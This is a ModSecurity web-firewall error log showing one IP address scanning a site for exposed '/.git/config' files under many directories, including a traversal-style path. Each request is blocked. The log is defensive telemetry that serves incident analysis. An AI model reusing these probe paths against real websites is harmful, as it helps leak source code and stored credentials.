[Sun Apr 20 18:22:33.731894 2025] [:error] [pid 2598999] [client 179.43.188.122:44048] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.git/config"] [unique_id "aAUfSTBDed00_-uEOh9oPwAAAAs"]
[Sun Apr 20 18:22:33.732038 2025] [:error] [pid 2598999] [client 179.43.188.122:44048] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.git/config"] [unique_id "aAUfSTBDed00_-uEOh9oPwAAAAs"]
[Sun Apr 20 18:22:33.738491 2025] [:error] [pid 2598997] [client 179.43.188.122:44074] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /files/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/files/.git/config"] [unique_id "aAUfSZxo1fL5GOjHvW-iDwAAAAk"]
[Sun Apr 20 18:22:33.738647 2025] [:error] [pid 2598998] [client 179.43.188.122:44058] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "aAUfSfGb6mAUUTmQVMS9LwAAAAo"]
[Sun Apr 20 18:22:33.738750 2025] [:error] [pid 2598997] [client 179.43.188.122:44074] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/files/.git/config"] [unique_id "aAUfSZxo1fL5GOjHvW-iDwAAAAk"]
[Sun Apr 20 18:22:33.738845 2025] [:error] [pid 2598998] [client 179.43.188.122:44058] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "aAUfSfGb6mAUUTmQVMS9LwAAAAo"]
[Sun Apr 20 18:22:33.738898 2025] [:error] [pid 2598997] [client 179.43.188.122:44074] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/files/.git/config"] [unique_id "aAUfSZxo1fL5GOjHvW-iDwAAAAk"]
[Sun Apr 20 18:22:33.738981 2025] [:error] [pid 2598998] [client 179.43.188.122:44058] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.git/config"] [unique_id "aAUfSfGb6mAUUTmQVMS9LwAAAAo"]
[Sun Apr 20 18:22:33.740194 2025] [:error] [pid 2599010] [client 179.43.188.122:44076] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /laravel/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.git/config"] [unique_id "aAUfSXNuewUkVloE_4FcugAAAA0"]
[Sun Apr 20 18:22:33.740343 2025] [:error] [pid 2599010] [client 179.43.188.122:44076] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.git/config"] [unique_id "aAUfSXNuewUkVloE_4FcugAAAA0"]
[Sun Apr 20 18:22:33.740476 2025] [:error] [pid 2599010] [client 179.43.188.122:44076] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.git/config"] [unique_id "aAUfSXNuewUkVloE_4FcugAAAA0"]
[Sun Apr 20 18:22:33.748230 2025] [:error] [pid 2598990] [client 179.43.188.122:44088] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/js../.git/config"] [unique_id "aAUfSZopp4YK0qAensjBswAAAAg"]
[Sun Apr 20 18:22:33.748404 2025] [:error] [pid 2598990] [client 179.43.188.122:44088] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/js../.git/config"] [unique_id "aAUfSZopp4YK0qAensjBswAAAAg"]
[Sun Apr 20 18:22:33.748540 2025] [:error] [pid 2598990] [client 179.43.188.122:44088] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/js../.git/config"] [unique_id "aAUfSZopp4YK0qAensjBswAAAAg"]
[Sun Apr 20 18:22:33.756004 2025] [:error] [pid 2597531] [client 179.43.188.122:44110] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /source/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/source/.git/config"] [unique_id "aAUfSSvq4uit1rpTjEgSHQAAAAI"]
[Sun Apr 20 18:22:33.756217 2025] [:error] [pid 2597531] [client 179.43.188.122:44110] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/source/.git/config"] [unique_id "aAUfSSvq4uit1rpTjEgSHQAAAAI"]
[Sun Apr 20 18:22:33.756403 2025] [:error] [pid 2597531] [client 179.43.188.122:44110] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/source/.git/config"] [unique_id "aAUfSSvq4uit1rpTjEgSHQAAAAI"]
[Sun Apr 20 18:22:33.758573 2025] [:error] [pid 2599013] [client 179.43.188.122:44100] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /assets/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.git/config"] [unique_id "aAUfScJN6RtskYJNqtKL-gAAAA8"]
[Sun Apr 20 18:22:33.758763 2025] [:error] [pid 2599013] [client 179.43.188.122:44100] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.git/config"] [unique_id "aAUfScJN6RtskYJNqtKL-gAAAA8"]
[Sun Apr 20 18:22:33.758901 2025] [:error] [pid 2599013] [client 179.43.188.122:44100] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.git/config"] [unique_id "aAUfScJN6RtskYJNqtKL-gAAAA8"]
[Sun Apr 20 18:22:33.759687 2025] [:error] [pid 2599000] [client 179.43.188.122:44116] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /scripts/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/scripts/.git/config"] [unique_id "aAUfSS74hH9DYn7JWeMqhgAAAAw"]
[Sun Apr 20 18:22:33.759846 2025] [:error] [pid 2599000] [client 179.43.188.122:44116] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/scripts/.git/config"] [unique_id "aAUfSS74hH9DYn7JWeMqhgAAAAw"]
[Sun Apr 20 18:22:33.759985 2025] [:error] [pid 2599000] [client 179.43.188.122:44116] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/scripts/.git/config"] [unique_id "aAUfSS74hH9DYn7JWeMqhgAAAAw"]
[Sun Apr 20 18:22:33.763860 2025] [:error] [pid 2597529] [client 179.43.188.122:44132] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /www/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "aAUfSQZGKWoSh0bB6I5KigAAAAA"]
[Sun Apr 20 18:22:33.764040 2025] [:error] [pid 2597529] [client 179.43.188.122:44132] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "aAUfSQZGKWoSh0bB6I5KigAAAAA"]
[Sun Apr 20 18:22:33.764185 2025] [:error] [pid 2597529] [client 179.43.188.122:44132] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "aAUfSQZGKWoSh0bB6I5KigAAAAA"]
[Sun Apr 20 18:22:33.767261 2025] [:error] [pid 2598999] [client 179.43.188.122:44144] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /dist/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/dist/.git/config"] [unique_id "aAUfSTBDed00_-uEOh9oQAAAAAs"]
[Sun Apr 20 18:22:33.767415 2025] [:error] [pid 2599012] [client 179.43.188.122:44136] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /template/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/template/.git/config"] [unique_id "aAUfSbkRSM_wWuOY-YzxcwAAAA4"]
[Sun Apr 20 18:22:33.767432 2025] [:error] [pid 2598999] [client 179.43.188.122:44144] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/dist/.git/config"] [unique_id "aAUfSTBDed00_-uEOh9oQAAAAAs"]
[Sun Apr 20 18:22:33.767566 2025] [:error] [pid 2598999] [client 179.43.188.122:44144] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/dist/.git/config"] [unique_id "aAUfSTBDed00_-uEOh9oQAAAAAs"]
[Sun Apr 20 18:22:33.767592 2025] [:error] [pid 2599012] [client 179.43.188.122:44136] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/template/.git/config"] [unique_id "aAUfSbkRSM_wWuOY-YzxcwAAAA4"]
[Sun Apr 20 18:22:33.767755 2025] [:error] [pid 2599012] [client 179.43.188.122:44136] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/template/.git/config"] [unique_id "aAUfSbkRSM_wWuOY-YzxcwAAAA4"]
[Sun Apr 20 18:22:33.773496 2025] [:error] [pid 2598997] [client 179.43.188.122:44154] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /sandbox/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/sandbox/.git/config"] [unique_id "aAUfSZxo1fL5GOjHvW-iEAAAAAk"]
[Sun Apr 20 18:22:33.773734 2025] [:error] [pid 2598997] [client 179.43.188.122:44154] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/sandbox/.git/config"] [unique_id "aAUfSZxo1fL5GOjHvW-iEAAAAAk"]
[Sun Apr 20 18:22:33.773922 2025] [:error] [pid 2598997] [client 179.43.188.122:44154] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/sandbox/.git/config"] [unique_id "aAUfSZxo1fL5GOjHvW-iEAAAAAk"]
[Sun Apr 20 18:22:33.781035 2025] [:error] [pid 2598998] [client 179.43.188.122:44162] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /old/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/old/.git/config"] [unique_id "aAUfSfGb6mAUUTmQVMS9MAAAAAo"]
[Sun Apr 20 18:22:33.781199 2025] [:error] [pid 2598998] [client 179.43.188.122:44162] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/old/.git/config"] [unique_id "aAUfSfGb6mAUUTmQVMS9MAAAAAo"]
[Sun Apr 20 18:22:33.781333 2025] [:error] [pid 2598998] [client 179.43.188.122:44162] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/old/.git/config"] [unique_id "aAUfSfGb6mAUUTmQVMS9MAAAAAo"]
[Sun Apr 20 18:22:33.784110 2025] [:error] [pid 2599010] [client 179.43.188.122:44170] [client 179.43.188.122] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /logs/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/logs/.git/config"] [unique_id "aAUfSXNuewUkVloE_4FcuwAAAA0"]
[Sun Apr 20 18:22:33.784359 2025] [:error] [pid 2599010] [client 179.43.188.122:44170] [client 179.43.188.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/logs/.git/config"] [unique_id "aAUfSXNuewUkVloE_4FcuwAAAA0"]
[Sun Apr 20 18:22:33.784530 2025] [:error] [pid 2599010] [client 179.43.188.122:44170] [client 179.43.188.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/logs/.git/config"] [unique_id "aAUfSXNuewUkVloE_4FcuwAAAA0"]
